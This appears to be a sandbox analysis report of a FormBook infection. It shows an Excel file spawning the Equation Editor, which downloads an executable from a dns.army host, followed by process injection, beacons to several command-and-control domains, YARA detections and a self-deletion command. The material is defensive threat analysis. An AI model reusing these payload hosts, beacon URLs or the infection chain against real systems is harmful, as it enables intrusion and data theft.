HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49170 | 103.141.138.117 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 11:38:08.700448990 CEST | 71 | OUT | GET /documepnt/winlog.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Connection: Keep-Alive
Host: stdypmrimelimtewsosq.dns.army
Apr 12, 2021 11:38:08.963999033 CEST | 72 | IN | HTTP/1.1 200 OK
Date: Mon, 12 Apr 2021 09:38:07 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34
Last-Modified: Wed, 07 Apr 2021 13:42:46 GMT
ETag: "324f1-5bf621b210103"
Accept-Ranges: bytes
Content-Length: 206065
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$lJ$$$/{$%9$"y$.$f"$Rich$PEL8E\f1p@Ptgp.text[\ `.rdatap`@@.datadr@.ndata.rsrcgv@@


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49171 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 11:39:06.563976049 CEST | 289 | OUT | GET /aqu2/?NP=K5Kf6zcgTMboCFmhMfN1gGfLaJuyFjl9HZYEWhqsekuFhK5NTINkzxSmehZhuXmdAQL3VA==&Yzrt=nN6d4T HTTP/1.1
Host: www.playfulpainters.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 11:39:06.765571117 CEST | 289 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 12 Apr 2021 09:39:06 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60733cbf-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49172 | 104.21.71.76 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 11:39:11.909651041 CEST | 290 | OUT | GET /aqu2/?NP=s46ojqJle3Soul44eo8rnM8O95xci96QFJKF/CkhZ8StqcbPmW9gr+kDew9qIR65/st6pQ==&Yzrt=nN6d4T HTTP/1.1
Host: www.hostvngiare.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 11:39:11.981149912 CEST | 291 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 12 Apr 2021 09:39:11 GMT
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=3600
Expires: Mon, 12 Apr 2021 10:39:11 GMT
Location: https://www.hostvngiare.com/aqu2/?NP=s46ojqJle3Soul44eo8rnM8O95xci96QFJKF/CkhZ8StqcbPmW9gr+kDew9qIR65/st6pQ==&Yzrt=nN6d4T
cf-request-id: 09670c19cb0000068e830b1000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZyBOrU4ckO7e3WehDe3r2bcSTKPUJAttYkMq%2BXaQBnlHHpuxL5dSNDKSpvRJP2FBB8MMysd95tPHkcApLTFmbUtaIVwhCuGHzAclt6yhI0qu8R0d"}],"max_age":604800,"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63eb7c6faf58068e-LHR
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49173 | 198.54.117.212 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 11:39:17.281395912 CEST | 292 | OUT | GET /aqu2/?NP=s0A+R2zuZA1+LPHAc9M/AmUzyN8aP2GBLv9J4fG53S1jdbvs3uSd9usyNyOEpwpEqUbLdg==&Yzrt=nN6d4T HTTP/1.1
Host: www.thesixteenthround.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49174 | 104.128.125.95 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 11:39:23.036487103 CEST | 293 | OUT | GET /aqu2/?NP=toEAtfX1LDSonbWoA+2t7dOdvm85giv91wk/sm/PalfrX1ye/8l3cmSiDehl2Pz5Hv2v/g==&Yzrt=nN6d4T HTTP/1.1
Host: www.qcmax.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 11:39:23.232377052 CEST | 294 | IN | HTTP/1.1 200 OK
Server: Tengine
Date: Mon, 12 Apr 2021 09:39:23 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Data Ascii: 341<html><head><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?dc4ddbf2b3feefda55750af44055021b"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.22 | 49175 | 144.76.242.196 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 11:39:38.657286882 CEST | 295 | OUT | GET /aqu2/?NP=n0kajkVKrFhs8OXGdIr62gA+iBln1jDamJdU2gSjeygeLyUnpUxBQzZrsA56E2MZ1cixJw==&Yzrt=nN6d4T HTTP/1.1
Host: www.christlicheliebe.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 11:39:38.728241920 CEST | 296 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 12 Apr 2021 09:39:38 GMT
Content-Type: text/html
Content-Length: 808
Connection: close
Last-Modified: Sat, 27 Jul 2019 17:29:53 GMT
ETag: "328-58ead01c2b1d3"
Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 69 73 20 70 61 67 65 20 65 69 74 68 65 72 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2c 20 6f 72 20 69 74 20 6d 6f 76 65 64 20 73 6f 6d 65 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 
6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.css"></head><body><div class="page"> <div class="main"> <h1>Server Error</h1> <div class="error-code">404</div> <h2>Page Not Found</h2> <p class="lead">This page either doesn't exist, or it moved somewhere else.</p> <hr/> <p>That's what you can do</p> <div class="help-actions"> <a href="javascript:location.reload();">Reload Page</a> <a href="javascript:history.back();">Back to Previous Page</a> <a href="/">Home Page</a> </div> </div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.22 | 49176 | 18.166.77.19 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 11:39:44.359040976 CEST | 297 | OUT | GET /aqu2/?NP=mL9TVQaOR/c/9ivG5fkw1nXZWj4Nbf+dNa5NuWBK0bSYoDjNDzx/n8mD4eDtsAuI9QTUuQ==&Yzrt=nN6d4T HTTP/1.1
Host: www.18598853855.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 11:39:44.587743044 CEST | 298 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Mon, 12 Apr 2021 09:39:44 GMT
Content-Type: text/html
Content-Length: 138
Connection: close
Location: https://www.18598853855.com#/?shareName=www.18598853855.com
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.22 | 49177 | 3.230.51.235 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 11:39:49.934220076 CEST | 299 | OUT | GET /aqu2/?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T HTTP/1.1
Host: www.starr2021.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 11:39:50.062820911 CEST | 299 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 12 Apr 2021 09:39:50 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 329
Connection: close
Server: Apache
Location: http://www.starr2021.com/aqu2?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 74 61 72 72 32 30 32 31 2e 63 6f 6d 2f 61 71 75 32 3f 4e 50 3d 46 44 53 54 69 5a 71 53 2f 37 77 75 35 36 78 72 35 75 64 31 58 74 59 45 44 56 4a 44 63 59 36 4a 53 78 47 36 73 32 5a 36 31 34 71 34 5a 4e 4c 4e 52 37 6f 74 50 76 65 71 47 48 31 6a 36 6f 62 68 70 59 37 76 32 77 3d 3d 26 61 6d 70 3b 59 7a 72 74 3d 6e 4e 36 64 34 54 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.starr2021.com/aqu2?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&amp;Yzrt=nN6d4T">here</a>.</p></body></html>


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Apr 12, 2021 11:38:06.606409073 CEST | 52.59.165.42 | 443 | 192.168.2.22 | 49167 | CN=*.short.gy; CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US; CN=DST Root CA X3, O=Digital Signature Trust Co. | Sat Jan 23 20:36:49 CET 2021; Wed Oct 07 21:21:40 CEST 2020 | Fri Apr 23 21:36:49 CEST 2021; Wed Sep 29 21:21:40 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b
(chain certificate) | | | | | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time:11:37:45
Start date:12/04/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13fe70000
File size:27641504 bytes
MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:11:38:09
Start date:12/04/2021
Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):true
Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:0x400000
File size:543304 bytes
MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:11:38:15
Start date:12/04/2021
Path:C:\Users\Public\vbc.exe
Wow64 process (32bit):true
Commandline:'C:\Users\Public\vbc.exe'
Imagebase:0x400000
File size:206065 bytes
MD5 hash:2C64897AA30694CC768F5EA375157932
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 16%, Metadefender
• Detection: 76%, ReversingLabs
Reputation:low

General

Start time:11:38:16
Start date:12/04/2021
Path:C:\Users\Public\vbc.exe
Wow64 process (32bit):true
Commandline:'C:\Users\Public\vbc.exe'
Imagebase:0x400000
File size:206065 bytes
MD5 hash:2C64897AA30694CC768F5EA375157932
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    Reputation:low

General

Start time: 11:38:25
Start date: 12/04/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0xffca0000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:38:38
Start date: 12/04/2021
Path: C:\Windows\SysWOW64\help.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\help.exe
Imagebase: 0xb00000
File size: 8704 bytes
MD5 hash: 0F488C73AA50C2FC1361F19E8FC19926
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 11:38:44
Start date: 12/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\Public\vbc.exe'
Imagebase: 0x4a5a0000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
